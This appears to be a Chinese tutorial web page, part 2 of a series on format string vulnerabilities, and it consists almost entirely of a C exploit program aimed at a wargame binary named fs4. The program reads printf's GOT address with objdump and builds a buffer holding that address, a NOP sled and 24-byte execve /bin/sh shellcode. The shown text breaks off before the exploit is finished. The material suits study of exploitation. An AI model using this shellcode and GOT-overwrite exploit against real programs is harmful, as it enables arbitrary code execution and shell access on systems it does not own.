非安全编程演示之格式化字符串(2)
2006-04-02 20:26:42 来源:WEB开发网
#define OBJDUMP "/usr/bin/objdump"
#define VICTIM "/home/user/gera/fs4"
#define GREP "/bin/grep"
/* 24 bytes shellcode */
char shellcode[]=
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
int main(void) {
char evil_buffer[49151 + 1], temp_buffer[64];
char *p;
int printf_address;
FILE *f;
sprintf(temp_buffer, "%s -R %s | %s printf", OBJDUMP, VICTIM,
GREP);
f = popen(temp_buffer, "r");
if( fscanf(f, "%x", &printf_address) != 1) {
pclose(f);
printf("Error: Cannot find printf() address in GOT!\n");
exit(1);
}
printf("printf() address in GOT is: 0x%x\n", printf_address);
/* Evil buffer */
p = evil_buffer;
/* Some junk here */
memset(p, 'B', 8);
p += 8;
*((void **)p) = (void *) (printf_address + 2);
p += 4;
/* Adding NOPs. 12 = 8(for junk) + 4(for address) */
memset(p, '\x90', (sizeof(evil_buffer) - strlen(shellcode) - 12 -
1));
p += (sizeof(evil_buffer) - strlen(shellcode) - 12 - 1);
/* Adding shellcode */
memcpy(p, shellcode, strlen(shellcode));
p += strlen(shellcode);
*p = '\0';
更多精彩
赞助商链接